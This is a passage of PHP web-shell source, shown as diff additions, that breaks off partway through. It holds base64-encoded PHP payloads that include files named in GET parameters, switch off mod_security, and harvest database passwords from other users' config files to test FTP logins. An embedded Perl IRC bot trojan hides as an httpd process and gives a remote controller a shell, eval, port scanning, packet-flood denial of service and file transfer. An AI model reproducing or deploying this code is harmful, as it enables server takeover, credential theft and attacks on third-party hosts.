+$egy_ini="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4="; +$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+"; +$egy_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4="; +$egy_vb=""; + 
+$egy_cp="PD9waHAgDQplY2hvICI8aHRtbD4iOyANCmVjaG8gIjx0aXRsZT5FZ1lfU3BJZEVyIFNoRWxMIDwvdGl0bGU+PFNUWUxFPg0KDQpCT0RZDQogew0KICAgICAgICBTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNIQURPVy1DT0xPUjogIzAwMDAwMDsgQ09MT1I6ICM2NjY2NjY7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjNzI2NDU2OyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICM3MjY0NTY7IFNDUk9MTEJBUi1UUkFDSy1DT0xPUjogIzI5MjkyOTsgRk9OVC1GQU1JTFk6IFZlcmRhbmE7IFNDUk9MTEJBUi1EQVJLU0hBRE9XLUNPTE9SOiAjNzI2NDU2DQp9DQoNCi50ZDEgew0KQk9SREVSOiAxOw0KZm9udDogN3B0IHRhaG9tYTsNCmNvbG9yOiAjZmZmZmZmOw0KfQ0KDQoudHIxIHsNCkJPUkRFUjogMTsNCmNvbG9yOiAjMzMzMzMzOw0KfQ0KdGFibGUgew0KQk9SREVSOiAgI2VlZWVlZSAgb3V0c2V0Ow0KQkFDS0dST1VORC1DT0xPUjogIzAwMDAwMDsNCmNvbG9yOiAjMzMzMzMzOw0KfQ0KdGV4dGFyZWEgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxIHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxIHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzMzMzMzMzsNCmZvbnQ6IEZpeGVkc3lzIGJvbGQ7DQpjb2xvcjogI2ZmZmZmZjsNCn0NCkJPRFkgew0KbWFyZ2luOiAxOw0KY29sb3I6ICMzMzMzMzM7DQpiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOw0KfQ0KQTpsaW5rIHtDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6dmlzaXRlZCB7IENPTE9SOnJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KQTphY3RpdmUge0NPTE9SOnJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KQTpob3ZlciB7Y29sb3I6Ymx1ZTtURVhULURFQ09SQVRJT046IG5vbmV9DQoNCjwvU1RZTEU+PGJvZHk+IjsgDQoNCnNldF90aW1lX2xpbWl0KDApOyANCiMjIyMjIyMjIyMjIyMjIyMjIyANCkAkcGFzc3dkPWZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsgDQppZiAoISRwYXNzd2QpIHsgDQogIGVjaG8gIlstXSBFcnJvciA6IGNvdWRuJ3QgcmVhZCAvZXRjL3Bhc3N3ZCI7IA0KICBleGl0OyANCn0gDQokcGF0aF90b19wdWJsaWM9YXJyYXkoKTsgDQokdXNlcnM9YXJyYXkoKTsgDQokcGF0aHRvY29uZj1hcnJheSgpOyANCiRpPTA7IA0KDQp3aGlsZSghZmVvZigkcGFzc3dkKSkgeyANCiRzdHI9ZmdldHMoJHBhc3N3ZCk7IA0KaWYgKCRpPjM1KSB7IA0KICAgJHBvcz1zdHJwb3MoJHN0ciwiOiIpOyANCiAgICR1c2VybmFtZT1zdWJzdHIoJHN0ciwwLCRwb3MpOyANCiAgICRkaXJ6PSIvaG9tZS8kdXNlcm5hbWUvcHVibGljX2h0bWwvIjsgDQogICBpZiAoKCR1c2VybmFtZSE9IiIpKSB7IA0KICAgICAgIGlmIChpc19yZW
FkYWJsZSgkZGlyeikpIHsgDQogICAgICAgICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7IA0KICAgICAgICAgICBhcnJheV9wdXNoKCRwYXRoX3RvX3B1YmxpYywkZGlyeik7IA0KICAgICAgIH0gDQogICB9IA0KfSANCiRpKys7IA0KfSANCiMjIyMjIyMjIyMjIyMjIyMjIyMgDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgDQplY2hvICI8YnI+PGJyPiI7IA0KZWNobyAiPHRleHRhcmVhIG5hbWU9J21haW5fd2luZG93JyBjb2xzPTEwMCByb3dzPTIwPiI7IA0KDQplY2hvICJbK10gRm91bmRlZCAiLnNpemVvZigkdXNlcnMpLiIgZW50cnlzIGluIC9ldGMvcGFzc3dkXG4iOyANCmVjaG8gIlsrXSBGb3VuZGVkICIuc2l6ZW9mKCRwYXRoX3RvX3B1YmxpYykuIiByZWFkYWJsZSBwdWJsaWNfaHRtbCBkaXJlY3Rvcmllc1xuIjsgDQoNCmVjaG8gIlt+XSBTZWFyY2hpbmcgZm9yIHBhc3N3b3JkcyBpbiBjb25maWcuKiBmaWxlcy4uLlxuXG4iOyANCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikgeyANCiAgICAgICAkcGF0aD0iL2hvbWUvJHVzZXIvcHVibGljX2h0bWwvIjsgDQogICAgICAgcmVhZF9kaXIoJHBhdGgsJHVzZXIpOyANCn0gDQoNCmVjaG8gIlxuWytdIERvbmVcbiI7IA0KDQpmdW5jdGlvbiByZWFkX2RpcigkcGF0aCwkdXNlcm5hbWUpIHsgDQogICBpZiAoJGhhbmRsZSA9IG9wZW5kaXIoJHBhdGgpKSB7IA0KICAgICAgIHdoaWxlIChmYWxzZSAhPT0gKCRmaWxlID0gcmVhZGRpcigkaGFuZGxlKSkpIHsgDQogICAgICAgICAgICAgJGZwYXRoPSIkcGF0aCRmaWxlIjsgDQogICAgICAgICAgICAgaWYgKCgkZmlsZSE9Jy4nKSBhbmQgKCRmaWxlIT0nLi4nKSkgeyANCiAgICAgICAgICAgICAgICBpZiAoaXNfcmVhZGFibGUoJGZwYXRoKSkgeyANCiAgICAgICAgICAgICAgICAgICAkZHI9IiRmcGF0aC8iOyANCiAgICAgICAgICAgICAgICAgICBpZiAoaXNfZGlyKCRkcikpIHsgDQogICAgICAgICAgICAgICAgICAgICAgcmVhZF9kaXIoJGRyLCR1c2VybmFtZSk7IA0KICAgICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgZWxzZSB7IA0KICAgICAgICAgICAgICAgICAgICAgICAgaWYgKCgkZmlsZT09J2NvbmZpZy5waHAnKSBvciAoJGZpbGU9PSdjb25maWcuaW5jLnBocCcpIG9yICgkZmlsZT09J2RiLmluYy5waHAnKSBvciAoJGZpbGU9PSdjb25uZWN0LnBocCcpIG9yICgkZmlsZT09J3dwLWNvbmZpZy5waHAnKSBvciAoJGZpbGU9PSd2YXIucGhwJykgb3IgKCRmaWxlPT0nY29uZmlndXJlLnBocCcpIG9yICgkZmlsZT09J2RiLnBocCcpIG9yICgkZmlsZT09J2RiX2Nvbm5lY3QucGhwJykpIHsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAkcGFzcz1nZXRfcGFzcygkZnBhdGgpOyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkcGFzcyE9JycpIHsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlY2hvICJbK10gJGZwYXRoXG4kcGFzc1xuIjsgDQogICAgICAgICAgIC
AgICAgICAgICAgICAgICAgICBmdHBfY2hlY2soJHVzZXJuYW1lLCRwYXNzKTsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICB9IA0KICAgICAgICAgICAgICAgICAgICAgICAgfSANCiAgICAgICAgICAgICAgICAgICB9IA0KICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgfSANCiAgICAgICB9IA0KICAgfSANCn0gDQoNCmZ1bmN0aW9uIGdldF9wYXNzKCRsaW5rKSB7IA0KICAgQCRjb25maWc9Zm9wZW4oJGxpbmssJ3InKTsgDQogICB3aGlsZSghZmVvZigkY29uZmlnKSkgeyANCiAgICAgICAkbGluZT1mZ2V0cygkY29uZmlnKTsgDQogICAgICAgaWYgKHN0cnN0cigkbGluZSwncGFzcycpIG9yIHN0cnN0cigkbGluZSwncGFzc3dvcmQnKSBvciBzdHJzdHIoJGxpbmUsJ3Bhc3N3ZCcpKSB7IA0KICAgICAgICAgICBpZiAoc3RycnBvcygkbGluZSwnIicpKSANCiAgICAgICAgICAgICAgJHBhc3M9c3Vic3RyKCRsaW5lLChzdHJwb3MoJGxpbmUsJz0nKSszKSwoc3RycnBvcygkbGluZSwnIicpLShzdHJwb3MoJGxpbmUsJz0nKSszKSkpOyANCiAgICAgICAgICAgZWxzZSANCiAgICAgICAgICAgICAgJHBhc3M9c3Vic3RyKCRsaW5lLChzdHJwb3MoJGxpbmUsJz0nKSszKSwoc3RycnBvcygkbGluZSwiJyIpLShzdHJwb3MoJGxpbmUsJz0nKSszKSkpOyANCiAgICAgICAgICAgcmV0dXJuICRwYXNzOyANCiAgICAgICB9IA0KICAgfSANCn0gDQoNCmZ1bmN0aW9uIGZ0cF9jaGVjaygkbG9naW4sJHBhc3MpIHsgDQogICAgQCRmdHA9ZnRwX2Nvbm5lY3QoJzEyNy4wLjAuMScpOyANCiAgICBpZiAoJGZ0cCkgeyANCiAgICAgICBAJHJlcz1mdHBfbG9naW4oJGZ0cCwkbG9naW4sJHBhc3MpOyANCiAgICAgICBpZiAoJHJlcykgeyANCiAgICAgICAgICBlY2hvICdbRlRQXSAnLiRsb2dpbi4nOicuJHBhc3MuIiAgU3VjY2Vzc1xuIjsgDQogICAgICAgfSANCiAgICAgICBlbHNlIGZ0cF9xdWl0KCRmdHApOyANCiAgICB9IA0KfSANCg0KZWNobyAiPC90ZXh0YXJlYT48YnI+IjsgDQoNCmVjaG8gIjwvYm9keT48L2h0bWw+IjsgDQo/Pg="; + + +if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname'])) +{ +$ircadmin=$_POST['ircadmin']; +$ircserver=$_POST['ircserver']; +$ircchan=$_POST['ircchanal']; +$irclabel=$_POST['ircname']; +echo "<title>OverclockiX Shell-Connector || Connecting to $ircserver<title>"; +echo "<body bgcolor=\"black\" text=\"green\">"; +echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font 
color=\"yellow\">$irclabel</font></b>"; +echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>"; +####################################################### +######################IRC Trojan########################## +$file=" +################ CONFIGURACAO ################################################################# +my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps # +#----------------------------------------------################################################ +my \$linas_max='48'; # Evita o flood :) depois de X linhas # +#----------------------------------------------################################################ +my \$sleep='4'; # ele dorme X segundos # +##################### IRC ##################################################################### +my @adms=(\"$ircadmin\"); # Nick do administrador # +#----------------------------------------------################################################ +my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") # +#----------------------------------------------################################################ +my \$nick='$irclabel'; # Nick do bot. 
Caso esteja em uso vai aparecer # + # aparecer com numero radonamico no final # +#----------------------------------------------################################################ +my \$ircname = 'Linux'; # User ID # +#----------------------------------------------################################################ +chop (my \$realname = `uname -a`); # Full Name # +#----------------------------------------------################################################ +\$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado # + # caso n?o seja especificado no argumento # +#----------------------------------------------################################################ +my \$porta='6667'; # Porta do servidor de irc # +################ ACESSO A SHELL ############################################################### +my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell # +############################################################################################### +my \$VERSAO = '0.2'; +\$SIG{'INT'} = 'IGNORE'; +\$SIG{'HUP'} = 'IGNORE'; +\$SIG{'TERM'} = 'IGNORE'; +\$SIG{'CHLD'} = 'IGNORE'; +\$SIG{'PS'} = 'IGNORE'; +\$SIG{'STOP'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir(\"/\"); +\$servidor=\"\$ARGV[0]\" if \$ARGV[0]; +$0=\"\$processo\".\"\0\"x16;; +my \$pid=fork; +exit if \$pid; +die \"Problema com o fork: $!\" unless defined(\$pid); +my \$dcc_sel = new IO::Select->new(); +############################# +# B0tchZ na veia ehehe :P # +############################# + +\$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my \$socket = \$_[0]; + print \$socket \"\$_[1]\\n\"; + } else { + print \$IRC_cur_socket \"\$_[0]\\n\"; + } +} +################################# +sub conectar { + my \$meunick = \$_[0]; + my \$servidor_con = \$_[1]; + my \$porta_con = \$_[2]; + + my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1); + if (defined(\$IRC_socket)) { + 
\$IRC_cur_socket = \$IRC_socket; + + \$IRC_socket->autoflush(1); + \$sel_cliente->add(\$IRC_socket); + + \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\"; + \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\"; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost; + nick(\"\$meunick\"); + sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\"); + sleep 1; + } +} ##################### + +my \$line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); } + delete(\$irc_servers{''}) if (defined(\$irc_servers{''})); + &DCC::connections; + my @ready = \$sel_cliente->can_read(0); + next unless(@ready); + foreach \$fh (@ready) { + \$IRC_cur_socket = \$fh; + \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'}; + \$nread = sysread(\$fh, \$msg, 4096); + if (\$nread == 0) { + \$sel_cliente->remove(\$fh); + \$fh->close; + delete(\$irc_servers{\$fh}); + } + @lines = split (/\\n/, \$msg); + + for(my \$c=0; \$c<= $#lines; \$c++) { + \$line = \$lines[\$c]; + \$line=\$line_temp.\$line if (\$line_temp); + \$line_temp=''; + \$line =~ s/\\r$//; + unless (\$c == $#lines) { + parse(\"\$line\"); + } else { + if ($#lines == 0) { + parse(\"\$line\"); + } elsif (\$lines[\$c] =~ /\\r$/) { + parse(\"\$line\"); + } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse(\"\$line\"); + } else { + \$line_temp = \$line; + } + } + } + } +} + +######################### + + +sub parse { + my \$servarg = shift; + if (\$servarg =~ /^PING \:(.*)/) { + sendraw(\"PONG :$1\"); + } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) 
\:(.+)/) { + my \$pn=$1; my \$onde = $4; my \$args = $5; + if (\$args =~ /^\\001VERSION\\001$/) { + notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\"); + } + if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) { + if (\$onde eq \"\$meunick\"){ + shell(\"\$pn\", \"\$args\"); + } + if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) { + my \$natrix = $1; + my \$arg = $2; + if (\$arg =~ /^\!(.*)/) { + ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/); + } elsif (\$arg =~ /^\@(.*)/) { + \$ondep = \$onde; + \$ondep = \$pn if \$onde eq \$meunick; + bfunc(\"\$ondep\",\"$1\"); + } else { + shell(\"\$onde\", \"\$arg\"); + } + } + } + } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc(\$meunick)) { + \$meunick=$4; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + } + } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) { + nick(\"\$meunick\".int rand(9999)); + } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + \$meunick = $2; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\"; + foreach my \$canal (@canais) { + sendraw(\"JOIN \$canal\"); + } + } +} +########################## + +sub bfunc { + my \$printl = \$_[0]; + my \$funcarg = \$_[1]; + if (my \$pid = fork) { + waitpid(\$pid, 0); + } else { + if (fork) { + exit; + } else { + if (\$funcarg =~ /^portscan (.*)/) { + my \$hostip=\"$1\"; + my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\"); + my (@aberta, %porta_banner); + foreach my \$porta (@portas) { + my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4); + if (\$scansock) { + push (@aberta, \$porta); + \$scansock->close; + } + } + + if (@aberta) { + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\"); + } else { + sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\"); + } + } + if (\$funcarg =~ 
/^pacota\s+(.*)\s+(\d+)\s+(\d+)/) { + my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\"); + \$dtime = 1 if \$dtime == 0; + my %bytes; + \$bytes{igmp} = $2 * \$pacotes{igmp}; + \$bytes{icmp} = $2 * \$pacotes{icmp}; + \$bytes{o} = $2 * \$pacotes{o}; + \$bytes{udp} = $2 * \$pacotes{udp}; + \$bytes{tcp} = $2 * \$pacotes{tcp}; + + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\"); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\"); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o})); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o})); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Media de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\"); + + } + exit; + } + } +} +########################## + + +sub ircase { + my (\$kem, \$printl, \$case) = @_; + + + if (\$case =~ /^join (.*)/) { + j(\"$1\"); + } + if (\$case =~ /^part (.*)/) { + p(\"$1\"); + } + if (\$case =~ /^rejoin\s+(.*)/) { + my \$chan = $1; + if (\$chan =~ /^(\d+) (.*)/) { + for (my \$ca = 1; \$ca <= $1; \$ca++ ) { + p(\"$2\"); + j(\"$2\"); + } + } else { + p(\"\$chan\"); + j(\"\$chan\"); + } + } + if (\$case =~ /^op/) { + op(\"\$printl\", \"\$kem\") if \$case eq \"op\"; + my \$oarg = substr(\$case, 3); + op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^deop/) { + deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\"; + my \$oarg = substr(\$case, 5); + deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^voice/) { + voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\"; + \$oarg = substr(\$case, 6); + voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^devoice/) { + devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\"; + \$oarg = substr(\$case, 
8); + devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^msg\s+(\S+) (.*)/) { + msg(\"$1\", \"$2\"); + } + if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my \$cf = 1; \$cf <= $1; \$cf++) { + msg(\"$2\", \"$3\"); + } + } + if (\$case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp(\"$1\", \"$2\"); + } + if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my \$cf = 1; \$cf <= $1; \$cf++) { + ctcp(\"$2\", \"$3\"); + } + } + if (\$case =~ /^invite\s+(\S+) (.*)/) { + invite(\"$1\", \"$2\"); + } + if (\$case =~ /^nick (.*)/) { + nick(\"$1\"); + } + if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) { + conectar(\"$2\", \"$1\", 6667); + } + if (\$case =~ /^send\s+(\S+)\s+(\S+)/) { + DCC::SEND(\"$1\", \"$2\"); + } + if (\$case =~ /^raw (.*)/) { + sendraw(\"$1\"); + } + if (\$case =~ /^eval (.*)/) { + eval \"$1\"; + } +} +########################## + +sub shell { + return unless \$secv; + my \$printl=\$_[0]; + my \$comando=\$_[1]; + if (\$comando =~ /cd (.*)/) { + chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \"); + return; + } + elsif (\$pid = fork) { + waitpid(\$pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`\$comando 2>&1 3>&1`; + my \$c=0; + foreach my \$linha (@resp) { + \$c++; + chop \$linha; + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\"); + if (\$c == \"\$linas_max\") { + \$c=0; + sleep \$sleep; + } + } + exit; + } + } +} + +#eu fiz um pacotadorzinhu e talz.. 
dai colokemo ele aki +sub attacker { + my \$iaddr = inet_aton(\$_[0]); + my \$msg = 'B' x \$_[1]; + my \$ftime = \$_[2]; + my \$cp = 0; + my (%pacotes); + \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++; + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++; + return(undef) if \$cp == 4; + my \$itime = time; + my (\$cur_time); + while ( 1 ) { + for (my \$porta = 1; \$porta <= 65535; \$porta++) { + \$cur_time = time - \$itime; + last if \$cur_time >= \$ftime; + send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++; + send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++; + send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++; + send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++; + + # DoS ?? :P + for (my \$pc = 3; \$pc <= 255;\$pc++) { + next if \$pc == 6; + \$cur_time = time - \$itime; + last if \$cur_time >= \$ftime; + socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next; + send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;; + } + } + last if \$cur_time >= \$ftime; + } + return(\$cur_time, %pacotes); +} + +############# +# ALIASES # +############# + +sub action { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\"); +} + +sub ctcp { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\"); +} +sub msg { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\$_[1]\"); +} + +sub notice { + return unless $#_ == 1; + sendraw(\"NOTICE \$_[0] :\$_[1]\"); +} + +sub op { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +o \$_[1]\"); +} +sub deop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -o \$_[1]\"); +} +sub hop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +h \$_[1]\"); +} +sub dehop { + return unless $#_ == 1; + sendraw(\"MODE 
\$_[0] +h \$_[1]\"); +} +sub voice { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +v \$_[1]\"); +} +sub devoice { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -v \$_[1]\"); +} +sub ban { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +b \$_[1]\"); +} +sub unban { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -b \$_[1]\"); +} +sub kick { + return unless $#_ == 1; + sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\"); +} + +sub modo { + return unless $#_ == 0; + sendraw(\"MODE \$_[0] \$_[1]\"); +} +sub mode { modo(@_); } + +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw(\"JOIN \$_[0]\"); +} +sub p { part(@_); } +sub part {sendraw(\"PART \$_[0]\");} + +sub nick { + return unless $#_ == 0; + sendraw(\"NICK \$_[0]\"); +} + +sub invite { + return unless $#_ == 1; + sendraw(\"INVITE \$_[1] \$_[0]\"); +} +sub topico { + return unless $#_ == 1; + sendraw(\"TOPIC \$_[0] \$_[1]\"); +} +sub topic { topico(@_); } + +sub whois { + return unless $#_ == 0; + sendraw(\"WHOIS \$_[0]\"); +} +sub who { + return unless $#_ == 0; + sendraw(\"WHO \$_[0]\"); +} +sub names { + return unless $#_ == 0; + sendraw(\"NAMES \$_[0]\"); +} +sub away { + sendraw(\"AWAY \$_[0]\"); +} +sub back { away(); } +sub quit { + sendraw(\"QUIT :\$_[0]\"); +} + +# DCC +######################### + +package DCC; + +sub connections { + my @ready = \$dcc_sel->can_read(1); +# return unless (@ready); + foreach my \$fh (@ready) { + my \$dcctipo = \$DCC{\$fh}{tipo}; + my \$arquivo = \$DCC{\$fh}{arquivo}; + my \$bytes = \$DCC{\$fh}{bytes}; + my \$cur_byte = \$DCC{\$fh}{curbyte}; + my \$nick = \$DCC{\$fh}{nick}; + + + my \$msg; + my \$nread = sysread(\$fh, \$msg, 10240); + + if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) { + \$DCC{\$fh}{status} = \"Cancelado\"; + \$DCC{\$fh}{ftime} = time; + \$dcc_sel->remove(\$fh); + \$fh->close; + next; + } + + if (\$dcctipo eq \"get\") { + \$DCC{\$fh}{curbyte} += length(\$msg); + + my \$cur_byte = \$DCC{\$fh}{curbyte}; + + open(FILE, \">> 
\$arquivo\"); + print FILE \"\$msg\" if (\$cur_byte <= \$bytes); + close(FILE); + + my \$packbyte = pack(\"N\", \$cur_byte); + print \$fh \"\$packbyte\"; + + + if (\$bytes == \$cur_byte) { + \$dcc_sel->remove(\$fh); + \$fh->close; + \$DCC{\$fh}{status} = \"Recebido\"; + \$DCC{\$fh}{ftime} = time; + next; + } + } elsif (\$dcctipo eq \"send\") { + my \$send = \$fh->accept; + \$send->autoflush(1); + \$dcc_sel->add(\$send); + \$dcc_sel->remove(\$fh); + \$DCC{\$send}{tipo} = 'sendcon'; + \$DCC{\$send}{itime} = time; + \$DCC{\$send}{nick} = \$nick; + \$DCC{\$send}{bytes} = \$bytes; + \$DCC{\$send}{curbyte} = 0; + \$DCC{\$send}{arquivo} = \$arquivo; + \$DCC{\$send}{ip} = \$send->peerhost; + \$DCC{\$send}{porta} = \$send->peerport; + \$DCC{\$send}{status} = \"Enviando\"; + #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon + open(FILE, \"< \$arquivo\"); + my \$fbytes; + read(FILE, \$fbytes, 1024); + print \$send \"\$fbytes\"; + close FILE; +# delete(\$DCC{\$fh}); +} elsif (\$dcctipo eq 'sendcon') { + my \$bytes_sended = unpack(\"N\", \$msg); + \$DCC{\$fh}{curbyte} = \$bytes_sended; + if (\$bytes_sended == \$bytes) { + \$fh->close; + \$dcc_sel->remove(\$fh); + \$DCC{\$fh}{status} = \"Enviado\"; + \$DCC{\$fh}{ftime} = time; + next; + } + open(SENDFILE, \"< \$arquivo\"); + seek(SENDFILE, \$bytes_sended, 0); + my \$send_bytes; + read(SENDFILE, \$send_bytes, 1024); + print \$fh \"\$send_bytes\"; + close(SENDFILE); + } + } +} +########################## + +sub SEND { + my (\$nick, \$arquivo) = @_; + unless (-r \"\$arquivo\") { + return(0); + } + + my \$dccark = \$arquivo; + \$dccark =~ 